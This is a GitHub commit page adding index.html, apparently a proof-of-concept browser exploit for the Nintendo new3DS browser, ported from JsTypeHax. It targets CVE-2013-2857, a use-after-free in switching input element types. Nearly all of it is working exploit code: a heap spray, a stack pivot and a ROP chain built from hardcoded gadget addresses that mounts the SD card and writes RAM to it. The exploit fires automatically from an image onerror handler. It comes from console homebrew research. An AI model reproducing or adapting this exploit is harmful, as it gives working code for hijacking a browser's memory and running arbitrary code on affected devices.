Skip to content

Commit d695346

Browse files
zoogiezoogie
zoogie
authored and
zoogie
committed
Initial hax POC upload
This is a port of JsTypeHax for the WiiU. https://github.com/WiiUTest/JsTypeHax All it does right now is dump SKATER's ram to SD, but the exploit does work. Only works on new3ds.
1 parent 2173922 commit d695346

File tree

1 file changed

+102
-0
lines changed

1 file changed

+102
-0
lines changed

index.html

Lines changed: 102 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,102 @@
1+
<!--
2+
Tested on 5.5.1
3+
CVE-2013-2857
4+
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
5+
Result: Bug is present, crash
6+
types=["checkbox","color","date","datetime-local","email","file","hidden","image","month","number","password","radio","range","reset","search","submit","tel","text","time","url","week"]
7+
-->
8+
<script>
9+
10+
function UaF3(a)
11+
{
12+
var bsize=0x2000000;
13+
var p = new ArrayBuffer(bsize);
14+
var payload = new Uint32Array(p);
15+
bsize=0x800000;
16+
17+
for(var b=0;b<bsize/4;b++){
18+
//payload[b]=0x90000000+(b*4);
19+
payload[b]=0;
20+
}
21+
22+
payload[(0x1ba000+0x18)/4]=0x09300000;
23+
payload[(0x1ba000)/4]=0x09300000;
24+
payload[(0x1ba000+0x14c)/4]=0x00ac144c; //ldmdb r0!, {ip, sp, lr, pc} (stack pivot)
25+
payload[(0x1ba000-0x4)/4]=0x001df60c; //POP_PC (pivot pc)
26+
payload[(0x1ba000-0x8)/4]=0x44444444; //GARBAGE (lr)
27+
payload[(0x1ba000-0xC)/4]=0x09310000; //ROP_ADDR (pivot sp)
28+
29+
/*
30+
seg006:009DC170 LDR R0, [R5,#4]
31+
seg006:009DC172 LDR R0, [R0,#0x18]
32+
seg006:009DC174 LDR R1, [R0]
33+
seg006:009DC176 ADDS R1, #0xFF
34+
seg006:009DC178 ADDS R1, #0x41
35+
seg006:009DC17A LDR R1, [R1,#0xC]
36+
seg006:009DC17C BLX R1
37+
*/
38+
39+
var POP_R0PC=0x00296e64;
40+
var POP_R1PC=0x0023e578;
41+
var POP_R0R3PC=0x00226d3c;
42+
var svcSleepThread=0x002d8cd4;
43+
var FS_MountSdmc=0x00318d30+4;
44+
var IFile_Open=0x003222e4+4;
45+
var IFile_Write=0x00327258+4;
46+
var GARBAGE=0x44444444;
47+
var FILE=0x09311000;
48+
//POP_R0R3PC=GARBAGE;
49+
50+
51+
//return;
52+
var rop=[
53+
POP_R0PC,
54+
0x2eccf2, // mc:
55+
FS_MountSdmc,
56+
GARBAGE,
57+
GARBAGE,
58+
GARBAGE,
59+
POP_R0R3PC,
60+
FILE,
61+
0x0931005c, // mc:/rd
62+
6,
63+
GARBAGE,
64+
IFile_Open,
65+
GARBAGE,
66+
GARBAGE,
67+
GARBAGE,
68+
GARBAGE,
69+
GARBAGE,
70+
POP_R0R3PC,
71+
FILE,
72+
FILE+32,
73+
0x100000,
74+
0x328000,
75+
IFile_Write,
76+
0x0063006d,
77+
0x002f003a,
78+
0x00640072,
79+
0
80+
]
81+
82+
for(var i=0; i < rop.length; i++){
83+
payload[(0x1ba000+0x10000+(i*4))/4]=rop[i];
84+
}
85+
86+
for(var i=0;i<1000;i++){
87+
var buf = new ArrayBuffer(0x18);
88+
var bufView = new Uint32Array(buf);
89+
bufView[0]=0x11131100;
90+
bufView[1]=0x09300000; //r5
91+
bufView[2]=0x39010018; //r6
92+
bufView[3]=0x44161400;
93+
bufView[4]=0xffffffff;
94+
bufView[5]=0x66181600;
95+
a.type="hidden";
96+
}
97+
98+
return 0;
99+
}
100+
</script>
101+
102+
<input type="image" onerror="UaF3(this);" src=""/>

0 commit comments

Comments
 (0)